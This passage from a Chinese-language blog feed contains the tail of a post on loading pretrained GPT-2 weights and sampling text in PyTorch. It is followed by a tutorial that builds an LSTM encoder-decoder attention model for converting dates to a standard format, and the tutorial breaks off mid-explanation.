            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm2</span><span class="p">.</span><span class="n">shift</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"ln_2"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>

    <span class="n">gpt</span><span class="p">.</span><span class="n">final_norm</span><span class="p">.</span><span class="n">scale</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">final_norm</span><span class="p">.</span><span class="n">scale</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">"g"</span><span class="p">])</span>
    <span class="n">gpt</span><span class="p">.</span><span class="n">final_norm</span><span class="p">.</span><span class="n">shift</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">final_norm</span><span class="p">.</span><span class="n">shift</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">"b"</span><span class="p">])</span>
    <span class="n">gpt</span><span class="p">.</span><span class="n">out_head</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">out_head</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">"wte"</span><span class="p">])</span>
    
    
<span class="n">load_weights_into_gpt</span><span class="p">(</span><span class="n">gpt</span><span class="p">,</span> <span class="n">params</span><span class="p">)</span>
<span class="n">gpt</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>

<span class="n">torch</span><span class="p">.</span><span class="n">manual_seed</span><span class="p">(</span><span class="mi">123</span><span class="p">)</span>

<span class="n">token_ids</span> <span class="o">=</span> <span class="n">generate</span><span class="p">(</span>
    <span class="n">model</span><span class="o">=</span><span class="n">gpt</span><span class="p">,</span>
    <span class="n">idx</span><span class="o">=</span><span class="n">text_to_token_ids</span><span class="p">(</span><span class="s">"Every effort moves you"</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">),</span>
    <span class="n">max_new_tokens</span><span class="o">=</span><span class="mi">25</span><span class="p">,</span>
    <span class="n">context_size</span><span class="o">=</span><span class="n">NEW_CONFIG</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">top_k</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span>
    <span class="n">temperature</span><span class="o">=</span><span class="mf">1.5</span>
<span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="s">"Output text:</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">token_ids_to_text</span><span class="p">(</span><span class="n">token_ids</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">))</span>
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Output text:
 Every effort moves you toward finding an ideal new way to practice something!

What makes us want to be on top of that?
</code></pre></div></div>

<h2 id="总结-1">总结</h2>

<p>LLMs的文本生成机制（贪婪解码、概率采样和温度缩放）、训练过程（损失函数和优化器）以及预训练的挑战和替代方案（使用公开的预训练权重）。这些技术和方法共同支撑了LLMs的高效训练和文本生成能力。</p>

<h3 id="1文本生成过程">1. <strong>文本生成过程</strong></h3>

<ul>
  <li>LLMs生成文本时，每次输出一个<strong>标记（token）</strong>。</li>
  <li>默认情况下，模型通过将输出转换为概率分数，并选择概率最高的标记（称为<strong>贪婪解码，greedy decoding</strong>）来生成下一个标记。</li>
  <li>为了提高生成文本的多样性和连贯性，可以使用<strong>概率采样（probabilistic sampling）和温度缩放（temperature scaling）</strong>。</li>
</ul>

<hr />

<h3 id="2训练与验证">2. <strong>训练与验证</strong></h3>

<ul>
  <li>训练和验证集的<strong>损失值（loss）</strong>用于评估LLM在训练过程中生成的文本质量。</li>
  <li>训练LLM的目标是通过调整模型权重来最小化训练损失。</li>
  <li>训练过程使用标准的深度学习流程，包括<strong>交叉熵损失函数（cross entropy loss）和AdamW优化器</strong>。</li>
</ul>

<hr />

<h3 id="3预训练">3. <strong>预训练</strong></h3>

<ul>
  <li>预训练LLM需要在一个大规模文本语料库上进行，这是一个<strong>耗时且资源密集</strong>的过程。</li>
  <li>为了避免从头开始预训练，可以使用公开的预训练权重（如OpenAI提供的权重）作为替代方案。</li>
</ul>

<hr />

<h1 id="总结-2">总结</h1>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="pytorch" /><category term="attention" /><category term="LLM" /><summary type="html"><![CDATA[阅读图书Build Large Language Model]]></summary></entry><entry><title type="html">Attention mechanism</title><link href="https://crabin.github.io/posts/2025/1/Attention%20mechanism/" rel="alternate" type="text/html" title="Attention mechanism" /><published>2025-01-13T00:00:00+00:00</published><updated>2025-01-13T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2025/1/Attention%20mechanism</id><content type="html" xml:base="https://crabin.github.io/posts/2025/1/Attention%20mechanism/"><![CDATA[<h2 id="pytorch-注意力模型实现详解以简单的机器翻译为例">PyTorch 注意力模型实现详解（以简单的机器翻译为例）</h2>

<p>Transformer中的“注意力”最早来自于NLP里的注意力模型。通过动手实现一遍注意力模型，我们能够更深刻地理解注意力的原理，以便于学习Transformer等后续那些基于注意力的模型。在这篇文章中，我将分享如何用PyTorch的基本API实现注意力模型，完成一个简单的机器翻译项目——把各种格式的日期“翻译”成统一格式的日期。</p>

<p>有关机器翻译、注意力模型相关知识请参考我之前的文章。如序列模型与注意力机制。</p>

<p>项目网址：https://github.com/SingleZombie/DL-Demos/tree/master/dldemos/attention</p>

<h3 id="知识背景">知识背景</h3>
<p>注意力模型发源自机器翻译任务。最早，基于RNN的机器翻译模型都采用如下的架构：</p>

<p><img src="pytorch_images/1.jpg" alt="image" /></p>

<p>前半部分的RNN只有输入，后半部分的RNN只有输出。两个部分通过一个简单的隐状态来传递信息。把隐状态看成输入信息的一种编码的话，前半部分可以叫做“编码器”，后半部分可以叫做“解码器”。这种架构因而被称为“编码器-解码器”架构。</p>

<p>这种架构在翻译短句子时确实有效，但面对长文章时就捉襟见肘了。使用“编码器-解码器”架构时，无论输入有多长，输入都会被压缩成一个简短的编码。也就是说，模型要一次性阅读完所有输入，再一次性输出所有翻译。这显然不是一种好的方法。联想一下，我们人类在翻译时，一般会读一句话，翻译一句话，读一句话，翻译一句话。基于这种思想，有人提出了注意力模型。注意力模型能够有效地翻译长文章。</p>

<p><img src="pytorch_images/2.jpg" alt="image" /></p>

<p>在注意力模型中，编码器和解码器以另一种方式连接在一起。在完成编码后，解码器会以不同的权重去各个编码输出中取出相关信息，也就是以不同的“注意力”去关注输入信息。</p>

<p><img src="pytorch_images/3.jpg" alt="image" /></p>

<p>具体来说，注意力模型的结构如下。</p>

<p><img src="pytorch_images/4.jpg" alt="image" /></p>

<p>对于每一轮的输出
，它的解码RNN的输入由上一轮输出
和注意力上下文
拼接而成。注意力上下文
，就是所有输入的编码RNN的隐变量
的一个加权平均数。这里加权平均数的权重
就是该输出对每一个输入的注意力。每一个
由编码RNN本轮状态
和解码RNN上一轮状态
决定。这两个输入会被送入一个简单的全连接网络，输出权重
（一个实数）。所有输入元素的
经过一个softmax输出
。</p>

<p>日期翻译任务及其数据集
为了简化项目的实现，我们来完成一个简单的日期翻译任务。在这个任务中，输入是各式各样的日期，输出是某一个标准格式的日期。比如：</p>

<p>| <strong>input</strong> | <strong>output</strong> |
| — | — |
| Nov 23, 1999 | 1999-11-23 |
| 3 April 2005 | 2005-04-03 |
| 14/01/1989 | 1989-01-14 |
| Thursday, February 7, 1985 | 1985-02-07 |
我们可以自己动手用<code class="language-plaintext highlighter-rouge">Python</code>生成数据集。在生成数据集时，我们要用到随机生成日期的<code class="language-plaintext highlighter-rouge">faker</code>库和格式化日期的<code class="language-plaintext highlighter-rouge">babel</code>库。</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip <span class="nb">install </span>faker babel
</code></pre></div></div>
<p>运行下面这段代码，我们可以生成不同格式的日期。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">random</span>

<span class="kn">from</span> <span class="nn">babel.dates</span> <span class="kn">import</span> <span class="n">format_date</span>
<span class="kn">from</span> <span class="nn">faker</span> <span class="kn">import</span> <span class="n">Faker</span>

<span class="n">faker</span> <span class="o">=</span> <span class="n">Faker</span><span class="p">()</span>
<span class="n">format_list</span> <span class="o">=</span> <span class="p">[</span>
    <span class="s">'short'</span><span class="p">,</span> <span class="s">'medium'</span><span class="p">,</span> <span class="s">'long'</span><span class="p">,</span> <span class="s">'full'</span><span class="p">,</span> <span class="s">'d MMM YYY'</span><span class="p">,</span> <span class="s">'d MMMM YYY'</span><span class="p">,</span> <span class="s">'dd/MM/YYY'</span><span class="p">,</span>
    <span class="s">'dd-MM-YYY'</span><span class="p">,</span> <span class="s">'EE d, MMM YYY'</span><span class="p">,</span> <span class="s">'EEEE d, MMMM YYY'</span>
<span class="p">]</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
    <span class="k">for</span> <span class="nb">format</span> <span class="ow">in</span> <span class="n">format_list</span><span class="p">:</span>
        <span class="n">date_obj</span> <span class="o">=</span> <span class="n">faker</span><span class="p">.</span><span class="n">date_object</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="nb">format</span><span class="si">}</span><span class="s">:'</span><span class="p">,</span> <span class="n">date_obj</span><span class="p">,</span>
              <span class="n">format_date</span><span class="p">(</span><span class="n">date_obj</span><span class="p">,</span> <span class="nb">format</span><span class="o">=</span><span class="nb">format</span><span class="p">,</span> <span class="n">locale</span><span class="o">=</span><span class="s">'en'</span><span class="p">))</span>
</code></pre></div></div>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Possible output:
short: 1986-02-25 2/25/86
medium: 1979-08-05 Aug 5, 1979
long: 1971-12-15 December 15, 1971
full: 2017-02-14 Tuesday, February 14, 2017
d MMM YYY: 1984-02-21 21 Feb 1984
d MMMM YYY: 2011-06-22 22 June 2011
dd/MM/YYY: 1991-08-02 02/08/1991
dd-MM-YYY: 1987-06-12 12-06-1987
EE d, MMM YYY: 1986-11-02 Sun 2, Nov 1986
EEEE d, MMMM YYY: 1996-01-26 Friday 26, January 1996
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">Faker()</code>是生成随机数据的代理类，用它的<code class="language-plaintext highlighter-rouge">date_object()</code>方法可以随机生成一个日期字符串<code class="language-plaintext highlighter-rouge">date_obj</code>。这个日期就是我们期望的标准格式。而通过使用<code class="language-plaintext highlighter-rouge">format_date</code>函数，我们可以通过改变该函数的<code class="language-plaintext highlighter-rouge">format</code>参数来得到格式不一样的日期字符串。各种格式的日期示例可以参考上面的输出。</p>

<p>利用这些工具函数，我们可以编写下面这些生成、读取数据集的函数。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">generate_date</span><span class="p">():</span>
    <span class="nb">format</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">choice</span><span class="p">(</span><span class="n">format_list</span><span class="p">)</span>
    <span class="n">date_obj</span> <span class="o">=</span> <span class="n">faker</span><span class="p">.</span><span class="n">date_object</span><span class="p">()</span>
    <span class="n">formated_date</span> <span class="o">=</span> <span class="n">format_date</span><span class="p">(</span><span class="n">date_obj</span><span class="p">,</span> <span class="nb">format</span><span class="o">=</span><span class="nb">format</span><span class="p">,</span> <span class="n">locale</span><span class="o">=</span><span class="s">'en'</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">formated_date</span><span class="p">,</span> <span class="n">date_obj</span>


<span class="k">def</span> <span class="nf">generate_date_data</span><span class="p">(</span><span class="n">count</span><span class="p">,</span> <span class="n">filename</span><span class="p">):</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">count</span><span class="p">):</span>
            <span class="n">formated_date</span><span class="p">,</span> <span class="n">date_obj</span> <span class="o">=</span> <span class="n">generate_date</span><span class="p">()</span>
            <span class="n">fp</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="n">formated_date</span><span class="si">}</span><span class="se">\t</span><span class="si">{</span><span class="n">date_obj</span><span class="si">}</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">load_date_data</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="s">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
        <span class="n">lines</span> <span class="o">=</span> <span class="n">fp</span><span class="p">.</span><span class="n">readlines</span><span class="p">()</span>
        <span class="k">return</span> <span class="p">[</span><span class="n">line</span><span class="p">.</span><span class="n">strip</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">).</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\t</span><span class="s">'</span><span class="p">)</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">lines</span><span class="p">]</span>


<span class="n">generate_date_data</span><span class="p">(</span><span class="mi">50000</span><span class="p">,</span> <span class="s">'dldemos/attention/train.txt'</span><span class="p">)</span>
<span class="n">generate_date_data</span><span class="p">(</span><span class="mi">10000</span><span class="p">,</span> <span class="s">'dldemos/attention/test.txt'</span><span class="p">)</span>
</code></pre></div></div>
<p>注意力模型
在这个项目中，最难的部分是注意力模型的实现，即如何把上一节那个结构图用PyTorch描述出来。所有模型实现的代码如下：</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">import</span> <span class="nn">torch.nn</span> <span class="k">as</span> <span class="n">nn</span>
<span class="kn">from</span> <span class="nn">torch.nn.utils.rnn</span> <span class="kn">import</span> <span class="n">pad_sequence</span>
<span class="kn">from</span> <span class="nn">torch.utils.data</span> <span class="kn">import</span> <span class="n">DataLoader</span><span class="p">,</span> <span class="n">Dataset</span>

<span class="kn">from</span> <span class="nn">dldemos.attention.dataset</span> <span class="kn">import</span> <span class="n">generate_date</span><span class="p">,</span> <span class="n">load_date_data</span>


<span class="n">EMBEDDING_LENGTH</span> <span class="o">=</span> <span class="mi">128</span>
<span class="n">OUTPUT_LENGTH</span> <span class="o">=</span> <span class="mi">10</span>

<span class="k">class</span> <span class="nc">AttentionModel</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span>
                 <span class="n">embeding_dim</span><span class="o">=</span><span class="mi">32</span><span class="p">,</span>
                 <span class="n">encoder_dim</span><span class="o">=</span><span class="mi">32</span><span class="p">,</span>
                 <span class="n">decoder_dim</span><span class="o">=</span><span class="mi">32</span><span class="p">,</span>
                 <span class="n">dropout_rate</span><span class="o">=</span><span class="mf">0.5</span><span class="p">):</span>
        <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">drop</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Dropout</span><span class="p">(</span><span class="n">dropout_rate</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">embedding</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Embedding</span><span class="p">(</span><span class="n">EMBEDDING_LENGTH</span><span class="p">,</span> <span class="n">embeding_dim</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">attention_linear</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="mi">2</span> <span class="o">*</span> <span class="n">encoder_dim</span> <span class="o">+</span> <span class="n">decoder_dim</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">softmax</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Softmax</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">encoder</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">LSTM</span><span class="p">(</span><span class="n">embeding_dim</span><span class="p">,</span>
                               <span class="n">encoder_dim</span><span class="p">,</span>
                               <span class="mi">1</span><span class="p">,</span>
                               <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span>
                               <span class="n">bidirectional</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">LSTM</span><span class="p">(</span><span class="n">EMBEDDING_LENGTH</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">encoder_dim</span><span class="p">,</span>
                               <span class="n">decoder_dim</span><span class="p">,</span>
                               <span class="mi">1</span><span class="p">,</span>
                               <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">output_linear</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">decoder_dim</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">decoder_dim</span> <span class="o">=</span> <span class="n">decoder_dim</span>

    <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">:</span> <span class="n">torch</span><span class="p">.</span><span class="n">Tensor</span><span class="p">,</span> <span class="n">n_output</span><span class="p">:</span> <span class="nb">int</span> <span class="o">=</span> <span class="n">OUTPUT_LENGTH</span><span class="p">):</span>
        <span class="c1"># x: [batch, n_sequence, EMBEDDING_LENGTH]
</span>        <span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">shape</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">2</span><span class="p">]</span>

        <span class="c1"># x: [batch, n_sequence, embeding_dim]
</span>        <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">embedding</span><span class="p">(</span><span class="n">x</span><span class="p">))</span>

        <span class="c1"># a: [batch, n_sequence, hidden]
</span>        <span class="n">a</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">encoder</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>

        <span class="c1"># prev_s: [batch, n_squence=1, hidden]
</span>        <span class="c1"># prev_y: [batch, n_squence=1, EMBEDDING_LENGTH]
</span>        <span class="c1"># y: [batch, n_output, EMBEDDING_LENGTH]
</span>        <span class="n">prev_s</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_zeros</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder_dim</span><span class="p">)</span>
        <span class="n">prev_y</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_zeros</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
        <span class="n">y</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_empty</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_output</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
        <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">None</span>
        <span class="k">for</span> <span class="n">i_output</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n_output</span><span class="p">):</span>
            <span class="c1"># repeat_s: [batch, n_squence, hidden]
</span>            <span class="n">repeat_s</span> <span class="o">=</span> <span class="n">prev_s</span><span class="p">.</span><span class="n">repeat</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
            <span class="c1"># attention_input: [batch * n_sequence, hidden_s + hidden_a]
</span>            <span class="n">attention_input</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">repeat_s</span><span class="p">,</span> <span class="n">a</span><span class="p">),</span>
                                        <span class="mi">2</span><span class="p">).</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span> <span class="o">*</span> <span class="n">n_squence</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
            <span class="n">alpha</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">attention_linear</span><span class="p">(</span><span class="n">attention_input</span><span class="p">))</span>
            <span class="n">c</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="nb">sum</span><span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">alpha</span><span class="p">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="mi">1</span><span class="p">)</span>
            <span class="n">c</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
            <span class="n">decoder_input</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">prev_y</span><span class="p">,</span> <span class="n">c</span><span class="p">),</span> <span class="mi">2</span><span class="p">)</span>

            <span class="k">if</span> <span class="n">tmp_states</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
                <span class="n">prev_s</span><span class="p">,</span> <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span><span class="p">(</span><span class="n">decoder_input</span><span class="p">)</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="n">prev_s</span><span class="p">,</span> <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span><span class="p">(</span><span class="n">decoder_input</span><span class="p">,</span> <span class="n">tmp_states</span><span class="p">)</span>

            <span class="n">prev_y</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">output_linear</span><span class="p">(</span><span class="n">prev_s</span><span class="p">)</span>
            <span class="n">y</span><span class="p">[:,</span> <span class="n">i_output</span><span class="p">]</span> <span class="o">=</span> <span class="n">prev_y</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">y</span>
</code></pre></div></div>
<p>让我们把这份实现一点一点过一遍。</p>

<p>在实现前，我们要准备一些常量。我们首先要决定“词汇表”的大小。在日期翻译任务中，输入和输出应当看成是字符序列。字符最多有128个，因此我们可以令“词汇表”大小为128。</p>

<p><code class="language-plaintext highlighter-rouge">EMBEDDING_LENGTH = 128</code></p>

<p>在我们这个任务中，输出序列的长度是固定的。对于yyyy-mm-dd这个日期字符串，其长度为10。我们要把这个常量也准备好。</p>

<p><code class="language-plaintext highlighter-rouge">OUTPUT_LENGTH = 10</code></p>

<p>接下来是模型的实现。先看__init__里的结构定义。一开始，按照RNN模型的惯例，我们要让输入过Dropout和嵌入层。对于单词序列，使用预训练的单词嵌入会好一点。然而，我们这个项目用的是字符序列，直接定义一个可学习的嵌入层即可。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">self</span><span class="p">.</span><span class="n">drop</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Dropout</span><span class="p">(</span><span class="n">dropout_rate</span><span class="p">)</span>
<span class="bp">self</span><span class="p">.</span><span class="n">embedding</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Embedding</span><span class="p">(</span><span class="n">EMBEDDING_LENGTH</span><span class="p">,</span> <span class="n">embeding_dim</span><span class="p">)</span>
</code></pre></div></div>
<p>接下来是编码器和解码器。在注意力模型中，编码器和解码器是两个不同的RNN。为了充分利用输入信息，可以把双向RNN当作编码器。而由于机器翻译是一个生成答案的任务，每轮生成元素时需要用到上一轮生成出来的元素，解码器必须是一个单向RNN。在本项目中，我使用的RNN是LSTM。模块定义代码如下：</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">self</span><span class="p">.</span><span class="n">encoder</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">LSTM</span><span class="p">(</span><span class="n">embeding_dim</span><span class="p">,</span>
                        <span class="n">encoder_dim</span><span class="p">,</span>
                        <span class="mi">1</span><span class="p">,</span>
                        <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span>
                        <span class="n">bidirectional</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="bp">self</span><span class="p">.</span><span class="n">decoder</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">LSTM</span><span class="p">(</span><span class="n">EMBEDDING_LENGTH</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">encoder_dim</span><span class="p">,</span>
                        <span class="n">decoder_dim</span><span class="p">,</span>
                        <span class="mi">1</span><span class="p">,</span>
                        <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>     
</code></pre></div></div>
<p>这里要注意一下这两个模块的输入通道数。encoder的输入来自嵌入层，因此是embeding_dim，这个很好理解。decoder的输入通道则需要计算一番了。decoder的输入由模型上一轮的输出和注意力输出拼接而成。模型每轮会输出一个字符，字符的通道数是“词汇表”大小，即<code class="language-plaintext highlighter-rouge">EMBEDDING_LENGTH</code>。注意力的输出是encoder的隐变量的加权和，因此其通道数和encoder的隐变量一致。encoder是双向RNN，其隐变量的通道数是<code class="language-plaintext highlighter-rouge">2 * encoder_dim</code>。最终，decoder的输入通道数应是<code class="language-plaintext highlighter-rouge">EMBEDDING_LENGTH + 2 * encoder_dim</code>。</p>

<p>在注意力模块中，解码RNN对各编码RNN的注意力由一个线性层计算而得。该线性层的输入由解码RNN和编码RNN的隐变量拼接而成，因此其通道数为<code class="language-plaintext highlighter-rouge">2 * encoder_dim + decoder_dim</code>；该线性层的输出是注意力权重——一个实数。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">self</span><span class="p">.</span><span class="n">attention_linear</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="mi">2</span> <span class="o">*</span> <span class="n">encoder_dim</span> <span class="o">+</span> <span class="n">decoder_dim</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
</code></pre></div></div>
<p>解码结束后，还需要经过一个线性层才能输出结果。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">self</span><span class="p">.</span><span class="n">output_linear</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">decoder_dim</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
</code></pre></div></div>

<p>看完了__init__，来看看forward里各模块是怎么连接起来的。</p>

<p>机器翻译其实是一个生成序列的任务。一般情况下，生成序列的长度是不确定的，需要用一些额外的技巧来选择最佳的输出序列。为了简化实现，在这个项目中，我们生成一个固定长度的输出序列。该长度应该在forward的参数里指定。因此，forward的参数如下：</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">:</span> <span class="n">torch</span><span class="p">.</span><span class="n">Tensor</span><span class="p">,</span> <span class="n">n_output</span><span class="p">:</span> <span class="nb">int</span> <span class="o">=</span> <span class="n">OUTPUT_LENGTH</span><span class="p">):</span>
</code></pre></div></div>
<p>一开始，先获取一些形状信息。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># x: [batch, n_sequence, EMBEDDING_LENGTH]
</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">shape</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">2</span><span class="p">]</span>
</code></pre></div></div>
<p>输入通过嵌入层和dropout层。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># x: [batch, n_sequence, embeding_dim]
